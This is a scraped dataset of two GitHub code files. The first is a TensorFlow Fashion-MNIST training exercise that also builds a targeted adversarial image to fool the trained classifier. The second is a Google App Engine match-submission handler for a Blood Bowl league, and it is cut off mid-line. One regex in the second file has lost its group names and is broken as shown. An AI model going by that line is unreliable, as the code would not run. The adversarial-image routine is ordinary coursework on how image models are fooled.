+{"seq_id": "7183277752", "text": "import datetime\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\nfrom model import mlp, conv_net\n\n\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\nnum_steps = 100000\nprint_steps = 1000\nsave_checkpoint_steps = 1000\n\n\ndef get_data():\n \"\"\"\n Get the Fashion MNIST dataset, in the proper data-types and shapes.\n The images are transformed from uint8 in 0,...,255 to float in [0,1].\n The labels are transformed from uint8 to int32.\n \"\"\"\n from tensorflow.keras.datasets import fashion_mnist\n (x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()\n n_train, h, w = x_train.shape\n n_test = x_test.shape[0]\n n_labels = len(np.unique(y_train))\n\n # Reshape the images to include a channels dimension (which is 1),\n # convert them to float32 and divide by 255 to get a value between 0 and 1\n x_train = x_train.reshape(-1, h, w, 1).astype(np.float32) / 255.0\n x_test = x_test.reshape(-1, h, w, 1).astype(np.float32) / 255.0\n\n # Convert the labels to int32 and not uint8, because this is what\n # TensorFlow wants (in the loss function sparse_softmax_cross_entropy_with_logits).\n y_train = y_train.astype(np.int32)\n y_test = y_test.astype(np.int32)\n\n return x_train, y_train, x_test, y_test, n_train, n_test, n_labels, h, w\n\n\ndef train(model_fn, batch_size, learning_rate=None, **model_kwargs):\n \"\"\"\n load FashionMNIST data.\n create model using model_fn, and train it on FashionMNIST.\n :param model_fn: a function to create the model (should be one of the functions from model.py)\n :param batch_size: the batch size for the training\n :param learning_rate: optional parameter - option to specify learning rate for the optimizer.\n :return:\n \"\"\"\n x_train, y_train, x_test, y_test, n_train, n_test, n_labels, h, w = get_data()\n\n x = tf.placeholder(dtype=tf.float32, shape=(None, h, w, 1), name='x')\n y = tf.placeholder(dtype=tf.int32, shape=(None,), name='y')\n test_mode = tf.placeholder_with_default(\n input=tf.constant(value=False, dtype=tf.bool, shape=(), name='test_mode_default'),\n shape=(),\n name='test_mode'\n )\n\n # Define the model.\n model_kwargs['test_mode'] = test_mode\n y_predict = model_fn(x, n_labels, **model_kwargs)\n\n # Define the loss function.\n loss = tf.reduce_mean(\n tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=y, logits=y_predict, name='non_reduced_loss'),\n name='reduced_loss'\n )\n\n # Define the optimizer.\n optimizer_kwargs = dict() if learning_rate is None else {'learning_rate': learning_rate}\n optimizer = tf.train.AdamOptimizer(**optimizer_kwargs).minimize(loss)\n\n # Define accuracy operator.\n correct_pred = tf.equal(tf.cast(tf.argmax(y_predict, axis=1), tf.int32), y)\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n # Add loss and accuracy to the summary, in order to view it in TensorBoard.\n tf.summary.scalar('loss', loss)\n tf.summary.scalar('accuracy', accuracy)\n summarize = tf.summary.merge_all()\n\n # Collect losses and accuracies, both for train-data and for test-data.\n train_losses = list()\n train_accuracies = list()\n test_losses = list()\n test_accuracies = list()\n\n init = tf.global_variables_initializer()\n\n # Define the directories that will be created with the TensorBoard data and checkpoints.\n now_str = datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S')\n logs_dir_name = os.path.join('logs', model_fn.__name__, now_str)\n checkpoint_directory = os.path.join(logs_dir_name, 'checkpoints')\n checkpoint_prefix = os.path.join(checkpoint_directory, \"ckpt\")\n saver = tf.train.Saver(max_to_keep=num_steps)\n train_writer = tf.summary.FileWriter(os.path.join(logs_dir_name, 'train'),\n tf.get_default_graph())\n test_writer = tf.summary.FileWriter(os.path.join(logs_dir_name, 'test'),\n tf.get_default_graph())\n with tf.Session() as sess:\n sess.run(init)\n for i in range(num_steps):\n # Sample a random mini-batch of samples from the training data.\n train_batch_indices = np.random.choice(n_train, size=batch_size)\n x_train_batch = x_train[train_batch_indices]\n y_train_batch = y_train[train_batch_indices]\n\n # Run the graph in that mini-batch, including the optimizer to update the weights.\n train_loss, train_accuracy, train_summary, _ = sess.run(\n fetches=[loss, accuracy, summarize, optimizer],\n feed_dict={x: x_train_batch, y: y_train_batch}\n )\n\n train_losses.append(train_loss)\n train_accuracies.append(train_accuracy)\n train_writer.add_summary(train_summary, i)\n\n # Sample a random mini-batch of samples from the testing data.\n test_batch_indices = np.random.choice(n_test, size=batch_size)\n x_test_batch = x_test[test_batch_indices]\n y_test_batch = y_test[test_batch_indices]\n\n # Run the graph in that mini-batch, excluding the optimizer (to avoid\n # update the weights according to the test data, strictly forbidden :))\n test_loss, test_accuracy, test_summary = sess.run(\n fetches=[loss, accuracy, summarize],\n feed_dict={x: x_test_batch, y: y_test_batch, test_mode: True}\n )\n\n test_losses.append(test_loss)\n test_accuracies.append(test_accuracy)\n test_writer.add_summary(test_summary, i)\n\n # Every print_steps iterations print train-loss.\n if i % print_steps == 0:\n print(\"Iter {:05d} train-loss {:.2f} train-accuracy {:.2f}\".format(i, train_loss, train_accuracy))\n print(\"Iter {:05d} test-loss {:.2f} test-accuracy {:.2f}\".format(i, test_loss, test_accuracy))\n\n # Every save_checkpoint_steps iterations save a checkpoint.\n if i % save_checkpoint_steps == 0:\n saver.save(sess, save_path=checkpoint_prefix, global_step=i)\n\n # After the training was finished, load the latest checkpoint and evaluate the model on\n # all samples in the test-data.\n all_test_losses = list()\n all_test_accuracies = list()\n with tf.Session() as sess:\n latest_checkpoint = tf.train.latest_checkpoint(checkpoint_directory)\n new_saver = tf.train.import_meta_graph(latest_checkpoint + '.meta')\n new_saver.restore(sess, latest_checkpoint)\n for i in range(n_test // batch_size):\n x_test_batch = x_test[i:i+batch_size]\n y_test_batch = y_test[i:i+batch_size]\n\n # Run the graph in that mini-batch, including the optimizer to update the weights.\n test_loss, test_accuracy = sess.run(\n fetches=[loss, accuracy],\n feed_dict={x: x_test_batch, y: y_test_batch}\n )\n all_test_losses.append(test_loss)\n all_test_accuracies.append(test_accuracy)\n\n all_test_loss = np.array(all_test_losses).mean()\n all_test_accuracy = np.array(all_test_accuracies).mean()\n print(\"Total test-loss {:.2f} test-accuracy {:.2f}\".format(all_test_loss, all_test_accuracy))\n\n train_writer.close()\n test_writer.close()\n\n\ndef find_adversarial_image(checkpoint):\n \"\"\"\n Finds and plots the original image with the true-label and prediction,\n and the adversarial image with the (wrong) prediction.\n :param checkpoint: A checkpoint of a trained model.\n \"\"\"\n x_train, y_train, x_test, y_test, n_train, n_test, n_labels, h, w = get_data()\n\n # Load the saved graph.\n new_saver = tf.train.import_meta_graph(checkpoint + '.meta')\n graph = tf.get_default_graph()\n\n # Extract the placeholders for the loaded graph,\n # and create additional tensors which calculate the classes' probabilities\n # and final class prediction (argmax of the probabilities).\n x = graph.get_tensor_by_name('x:0')\n y = graph.get_tensor_by_name('y:0')\n test_mode = graph.get_tensor_by_name('test_mode:0')\n predict_logits = graph.get_tensor_by_name('predict:0')\n predict_prob = tf.nn.softmax(logits=predict_logits, axis=1)\n # predict_class = tf.argmax(predict_prob, axis=1)\n loss = graph.get_tensor_by_name('reduced_loss:0')\n\n # Sample a random image from the training data, and sample a wrong label for it.\n i = np.random.randint(n_train)\n image = x_train[i]\n true_label = y_train[i]\n target_label = np.random.choice(list(set(np.arange(n_labels)) - {true_label}))\n\n # Create the image-loss, which implicates that the\n # resulting image will be close to the original one.\n image_tensor = tf.constant(value=image, dtype=tf.float32, name='source_image')\n image_loss = tf.reduce_mean(tf.abs(tf.subtract(x, image_tensor, name='sub'), 'abs'), name='image_loss')\n\n # Define the new loss as the weighted sum of the original loss and the image-loss.\n image_loss_weight = 0.05\n new_loss = tf.add(loss, image_loss_weight * image_loss)\n\n # Create a symbolic tensor calculating the gradient\n # of the new loss with respect to the input image.\n grad = tf.gradients(ys=new_loss, xs=[x])\n\n curr_image = image.copy().reshape(1, 28, 28, 1)\n orig_classes_prob = None\n target_label_reshaped = np.array([target_label], dtype=np.int32)\n\n with tf.Session() as sess:\n new_saver.restore(sess, checkpoint)\n\n for i in range(10000):\n # Calculate the gradient with respect to the input image,\n # as well as the predicted classes' probabilities.\n grad_image, classes_prob = sess.run(\n [grad, predict_prob],\n feed_dict={x: curr_image, y: target_label_reshaped, test_mode: True}\n )\n\n # Take the relevant values, as the sess.run return a list of nested values...\n grad_image = grad_image[0][0]\n classes_prob = classes_prob[0]\n\n # In case this is the first iteration, save the classes' probabilities\n # as they are the original prediction.\n if i == 0:\n orig_classes_prob = np.copy(classes_prob)\n\n # print('True/Target-label probabilities = {:.2f} ; {:.2f}'.format(classes_prob[target_label],\n # classes_prob[true_label]))\n\n if classes_prob[target_label] > 0.95:\n break\n\n # Update the current-image with respect to the gradient of the new loss function.\n # This makes the loss function decrease, so the prediction gets close to the target\n # label, and the image remains not fat from the original one.\n learning_rate = 0.001\n curr_image -= learning_rate * grad_image\n\n # Plot the original image, the added noise, and the final adversarial image.\n plt.subplot(1, 3, 1)\n plt.axis('off')\n plt.imshow(image[:, :, 0], cmap='gray')\n plt.title('{}, w.p. {:.4f}'.format(class_names[true_label], orig_classes_prob[true_label]))\n\n plt.subplot(1, 3, 2)\n plt.axis('off')\n plt.imshow(curr_image[0, :, :, 0] - image[:, :, 0], cmap='gray')\n plt.title('Add noise...')\n\n plt.subplot(1, 3, 3)\n plt.axis('off')\n plt.imshow(curr_image[0, :, :, 0], cmap='gray')\n plt.title('{}, w.p. {:.4f}'.format(class_names[target_label], classes_prob[target_label]))\n plt.show()\n\n\ndef main():\n # train(mlp, 64)\n # train(mlp, 64, dropout_rate=0.25)\n # train(conv_net, 64)\n train(conv_net, 64, dropout_rate=0.25)\n # find_adversarial_image(checkpoint='logs/conv_net/2019_11_16_16_38_00_drop_025/checkpoints/ckpt-50000')\n pass\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "AlonNT/APML", "sub_path": "ex1/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 11872, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow.keras.datasets.fashion_mnist.load_data", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.keras.datasets.fashion_mnist", "line_number": 24, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.int32", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.int32", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder_with_default", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.bool", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.nn.sparse_softmax_cross_entropy_with_logits", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 74, "usage_type": "attribute"}, {"api_name": "tensorflow.equal", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.scalar", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 81, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.scalar", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 82, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.merge_all", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 83, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 91, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 94, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 94, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Saver", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 99, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 99, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 101, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 101, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 107, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 150, "usage_type": "call"}, {"api_name": "tensorflow.train.latest_checkpoint", "line_number": 151, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 151, "usage_type": "attribute"}, {"api_name": "tensorflow.train.import_meta_graph", "line_number": 152, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 152, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 167, "usage_type": "call"}, {"api_name": "tensorflow.train.import_meta_graph", "line_number": 183, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 183, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 184, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax", "line_number": 193, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 193, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 198, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 201, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 201, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 205, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 205, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.abs", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.subtract", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.add", "line_number": 210, "usage_type": "call"}, {"api_name": "tensorflow.gradients", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 218, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 238, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 253, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 254, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 254, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 255, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 255, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 256, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 256, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 258, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 259, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 259, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 260, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 261, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 264, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 264, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 265, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 265, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 266, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 267, "usage_type": "name"}, {"api_name": "model.conv_net", "line_number": 274, "usage_type": "argument"}]}
+{"seq_id": "41213090574", "text": "\nfrom google.appengine.api.labs import taskqueue\nfrom google.appengine.api import mail\nfrom google.appengine.ext import db\nimport re, logging, random, datetime\n\nfrom models import *\nfrom grappl.utils import batch_put\nimport views, misc\n\n\ndef prepare_submit(data, handler=None, localtest=False):\n\n def read_and_delete(key):\n ret = data.get(key)\n if ret:\n del data[key]\n return ret\n else:\n return \"\"\n\n signature = read_and_delete(\"signature\")\n md5 = read_and_delete(\"md5\")\n disconnect = bool(read_and_delete(\"disconnect\"))\n bblog = read_and_delete(\"bblog\")\n\n # get team entities\n team_names = [data[\"home_name\"], data[\"away_name\"]]\n teams = [Team.get_or_insert(name) for name in team_names]\n\n # this is our match lookup aid\n match_lookup = MatchLookup.get_or_insert(MatchLookup.get_key_name(teams))\n logging.debug(\"looked up %s\" % match_lookup.get_string())\n\n # There is a race condition here. We need to refetch the last\n # match inside a transaction before we create the new match.\n def get_or_create_match():\n previous_matches = Match.all().ancestor(\n match_lookup).order(\"-created\").fetch(1)\n\n if previous_matches:\n last_match = previous_matches[0]\n last_md5 = SubmitData.all().ancestor(last_match).get().md5\n else:\n last_match = None\n last_md5 = None\n\n # Create the match if any of the following are true:\n # * their is no prior match on record between these two teams\n # * the MD5 hashes of this submit and the submit of the last match don't\n # match up\n if not last_match or last_md5 != md5:\n match = Match(parent = match_lookup, disconnect = disconnect)\n match.put()\n created = True\n else:\n match = last_match\n match.both_submitted = True\n match.put()\n created = False\n\n submit_data = SubmitData(\n key_name = signature,\n parent = match,\n disconnect = disconnect,\n md5 = md5,\n data = data,\n bblog = bblog)\n submit_data.put()\n\n return (match, submit_data, created)\n\n logging.debug(\"calling get_or_create_match for %s\" % match_lookup.get_string())\n match, submit_data, created = db.run_in_transaction(get_or_create_match)\n\n if created:\n try:\n # if we created the match, we will initiate processing\n logging.debug(\"match %s created\" % match_lookup.get_string())\n\n if localtest:\n # dev_appserver has no support for tasks so we do it manually\n process_submit(submit_data, localtest=localtest)\n \n else:\n logging.debug(\"match %s updated; spawning submit task\" %\n match_lookup.get_string())\n\n taskqueue.add(url=\"/grappl/tasks/submit\", params={\n 'submit_data_key_string': submit_data.key(),\n })\n\n # if we receive an exception delete the match to allow a retry\n except:\n match.delete()\n submit_data.delete()\n raise\n\n else:\n # check to make sure everything is consistent\n submit_data2 = SubmitData.all().ancestor(\n match).filter(\"__key__ !=\", submit_data.key()).fetch(1)[0]\n\n my_data = submit_data.data\n their_data = submit_data2.data\n\n assert_log = misc.AssertLog(match_lookup.get_string())\n for key in my_data.keys():\n assert_log.check(my_data[key], their_data[key], \"my %s\" % key)\n\n for key in their_data.keys():\n assert_log.check(their_data[key], my_data[key], \"their %s\" % key)\n\n if assert_log.mail():\n logging.warning(\"%s verification failed.\" % match_lookup.get_string())\n\n\ndef process_submit(submit_data, localtest=False):\n \"\"\"Submit the match.\n \n Ideally we want this whole post to be a transaction, but it would require us\n to lock the whole datastore which is not GAE-like. We can take advantage of\n memcache to ensure that the updates won't become visible to the web page\n until we're done and we clear out the relevant memcache entries.\n\n Still, we want to not commit the match record entries (TeamRecord and\n PlayerRecord) until the last possible moment to make the possibility of a\n parallel memcache clear presenting an inconsistent view to the users view\n maximally unlikely.\"\"\"\n\n data = submit_data.data\n match = submit_data.parent()\n match_lookup = match.parent()\n\n assert_log = misc.AssertLog(match_lookup.get_string())\n\n # First extract the information into the right categories:\n # team data,\n # team record data,\n # team player data, and\n # team player record data\n #--------------------------------------------------------------------#\n\n both_team_data = ({}, {})\n both_players_data = ({}, {})\n\n both_team_record_data = ({}, {})\n both_player_records_data = ({}, {})\n\n def str_getter(val): return val # do not use str() in case of unicode\n def int_getter(val): return int(val)\n def bool_getter(val):\n if val:\n return True\n else:\n return False\n\n # ReferenceProperties\n def position_getter(val): return db.Key.from_path(\"Position\", val)\n def race_getter(val): return db.Key.from_path(\"Race\", val)\n\n def skills_getter(val): \n skills = []\n for skill_name in [s.strip() for s in val.split(\",\")]:\n if skill_name:\n skills.append(db.Key.from_path(\"Skill\", skill_name))\n return skills\n\n def injuries_getter(val): \n injuries = []\n for injury_name in [s.strip() for s in val.split(\",\")]:\n if injury_name:\n injuries.append(db.Key.from_path(\"Injury\", injury_name))\n return injuries\n\n team_attr_map = {\n # fixed\n \"name\": (True, str_getter),\n \"race\": (True, race_getter),\n \"logo\": (True, str_getter),\n \"color\": (True, int_getter),\n\n # profile\n \"cash\": (False, int_getter),\n \"ff\": (False, int_getter),\n \"rerolls\": (False, int_getter),\n \"apoths\": (False, int_getter),\n \"cheers\": (False, int_getter),\n \"coaches\": (False, int_getter),\n\n # stats\n \"result\": (False, int_getter),\n \"tv_for\": (False, int_getter),\n \"tv_against\": (False, int_getter),\n }\n\n player_attr_map = {\n # fixed\n \"number\": (True, int_getter),\n \"bb_id\": (True, int_getter),\n \"position\": (True, position_getter),\n \"name\": (True, str_getter),\n\n # profile\n \"mv\": (False, int_getter),\n \"st\": (False, int_getter),\n \"ag\": (False, int_getter),\n \"av\": (False, int_getter),\n \"level\": (False, int_getter),\n \"spp\": (False, int_getter),\n \"value\": (False, int_getter),\n \"skills\": (False, skills_getter),\n \"injuries\": (False, injuries_getter),\n\n # other\n \"match_injuries\": (False, injuries_getter),\n\n # stats\n \"played\": (False, int_getter),\n \"mvps\": (False, int_getter),\n \"tds_for\": (False, int_getter),\n \"passes_for\": (False, int_getter),\n \"pyards_for\": (False, int_getter),\n \"rec_for\": (False, int_getter),\n \"ryards_for\": (False, int_getter),\n \"int_for\": (False, int_getter),\n \"int_against\": (False, int_getter),\n \"tckl_for\": (False, int_getter),\n \"tckl_against\": (False, int_getter),\n \"kills_for\": (False, int_getter),\n \"kills_against\": (False, int_getter),\n \"cas_for\": (False, int_getter),\n \"cas_against\": (False, int_getter),\n \"ko_for\": (False, int_getter),\n \"ko_against\": (False, int_getter),\n \"stun_for\": (False, int_getter),\n \"stun_against\": (False, int_getter),\n \"inj_for\": (False, int_getter),\n \"inj_against\": (False, int_getter),\n }\n\n player_stat_regex = re.compile(\n r\"(?P\\w+)_(?Pp\\d+)_(?P\\w+)\")\n\n for key, value in sorted(data.items()):\n hit = player_stat_regex.match(key)\n if hit:\n # it's a player attribute\n\n def get_map(team_id, player_id, is_player_data):\n index = (0 if team_id == \"home\" else 1)\n data = (both_players_data if is_player_data else\n both_player_records_data)\n\n return data[index].setdefault(player_id, {})\n\n team_id, player_id, attr = [str(x) for x in hit.groups()]\n is_player_data, converter = player_attr_map[attr]\n map = get_map(team_id, player_id, is_player_data)\n\n else:\n # it's a team attribute\n\n def get_map(is_team_data):\n index = (0 if team_id == \"home\" else 1)\n data = (both_team_data if is_team_data else\n both_team_record_data)\n\n return data[index]\n\n team_id, attr = [str(x) for x in key.split(\"_\", 1)]\n is_team_data, converter = team_attr_map[attr]\n map = get_map(is_team_data)\n\n map[attr] = converter(value)\n\n\n # Build team aggregate statistics\n #--------------------------------------------------------------------#\n \n for which_team, team_record_data in enumerate(both_team_record_data):\n for attr in sorted(TeamStats.properties()):\n if attr.startswith(\"tv_\"):\n # these are already handled\n continue\n\n if \"for\" in attr:\n opp_attr = attr.replace(\"for\", \"against\")\n else:\n opp_attr = attr.replace(\"against\", \"for\")\n\n def compute_aggregate(which_team, attr):\n return sum([v.get(attr, 0) for v in\n both_player_records_data[which_team].values()])\n\n inputs = ((which_team, attr), (which_team ^ 1, opp_attr))\n sums = [compute_aggregate(*input) for input in inputs]\n\n if all([s != 0 for s in sums]) and not any(\n [x for x in (\"cas_\", \"kills_\", \"stun_\", \"ko_\") if x in attr]):\n assert_log.check(sums[0], sums[1], context=\"aggregate sum for %s\" % attr)\n\n # as a safety, in case we fail we take the maximum of the two\n team_record_data[attr] = max(sums)\n\n # Now build the actual models\n #--------------------------------------------------------------------#\n\n both_teams = []\n both_team_records = []\n both_players = ([], [])\n both_player_records = ([], [])\n\n for team_data in both_team_data:\n # Again, like match, we need to create (\"put\") the team if it doesn't\n # already exist. Fortunately this is an idempotent operation.\n team = Team.get_by_key_name(team_data['name'])\n team.race = team_data['race']\n team.logo = get_logo(team_data['logo'])\n team.color = get_color(team_data['color'])\n team.last_active = datetime.date.today()\n team.retired = False\n both_teams.append(team)\n\n for which_team, team_record_data in enumerate(both_team_record_data):\n team = both_teams[which_team]\n team_record_data[\"parent\"] = match\n team_record_data[\"key_name\"] = \"%s\" % which_team\n team_record_data[\"tv\"] = team_record_data[\"tv_for\"]\n team_record_data[\"disconnect\"] = submit_data.disconnect\n team_record_data[\"team\"] = team\n team_record_data[\"glicko_r\"] = team.glicko_r\n team_record_data[\"glicko_RD\"] = team.glicko_RD\n team_record_data[\"status\"] = team.status\n\n both_team_records.append(TeamRecord(**team_record_data))\n\n for which_team, players_data in enumerate(both_players_data):\n for player_key, player_data in players_data.items():\n # For the players, just like with the teams and the match, we need to\n # create (\"put\") the entities first before we can do anything with\n # them. Just like with the teams, this is an idempotent operation.\n team = both_teams[which_team]\n player_data[\"team\"] = team.key()\n player = Player.create(**player_data)\n both_players[which_team].append(player)\n\n for which_team, player_records_data in enumerate(\n both_player_records_data):\n for which_player, player_record_data in enumerate(\n player_records_data.values()):\n\n player_record_data[\"parent\"] = match\n player_record_data[\"key_name\"] = \"%s:%s\" % (which_team, which_player)\n player_record_data[\"player\"] = (\n both_players[which_team][which_player])\n player_record = PlayerRecord(**player_record_data)\n\n both_player_records[which_team].append(player_record)\n\n # Prepare to commit\n #--------------------------------------------------------------------#\n put_list = []\n\n # Update records\n for players, player_records in zip(both_players, both_player_records):\n for player, player_record in zip(players, player_records):\n put_list.append(player)\n put_list.append(player_record)\n\n for team, team_record in zip(both_teams, both_team_records):\n put_list.append(team)\n put_list.append(team_record)\n\n # Commit\n #--------------------------------------------------------------------#\n\n # Batch commit! This is as close to a transaction as we are going to get.\n logging.debug(\"preparing to commit phase 1 %s \" % match_lookup.get_string())\n batch_put(put_list)\n\n put_list = []\n # Add some last-minute links to speed things up. We couldn't do this before\n # because the entities we're linking to didn't exist in the datastore yet\n for which_team, (team, team_record) in enumerate(zip(both_teams, both_team_records)):\n team_record.opponent_record = both_team_records[which_team ^ 1]\n put_list.append(team_record)\n\n for player_record in both_player_records[which_team]:\n player_record.team_record = team_record\n put_list.append(player_record)\n\n logging.debug(\"preparing to commit phase 2 %s \" % match_lookup.get_string())\n db.put(put_list)\n\n # Done!\n logging.debug(\"submit task for %s terminating successfully\" %\n match_lookup.get_string())\n\n match.processed = True\n match.put()\n\n assert_log.mail()\n\n if localtest:\n # dev_appserver has no support for tasks so we do it manually\n process_update(match)\n else:\n logging.debug(\"spawning update task for %s\" % match_lookup.get_string())\n\n # We do this separately because otherwise we run up against the 30 second\n # limit\n taskqueue.add(url=\"/grappl/tasks/update\", params={\n 'match_key_string': match.key(),\n })\n\n\ndef process_update(match):\n match_lookup = match.parent()\n put_list = []\n\n logging.debug(\"preparing to update for %s\" % match_lookup.get_string())\n\n assert_log = misc.AssertLog(match_lookup.get_string())\n season, week = misc.get_ofl_season_and_week()\n\n # Update team information\n #--------------------------------------------------------------------#\n\n team_records = list(match.get_team_records_query())\n teams = [record.team for record in team_records]\n coach_stats_list = []\n \n for team, team_record in zip(teams, team_records):\n\n # this check is to make sure we only do this once (for idempotence) in case\n # of a retry\n if team.teamrecord_set.count() > team.matches:\n team.update(team_record)\n coach = team.coach\n if coach:\n coach.last_active = datetime.date.today()\n coach_stats = 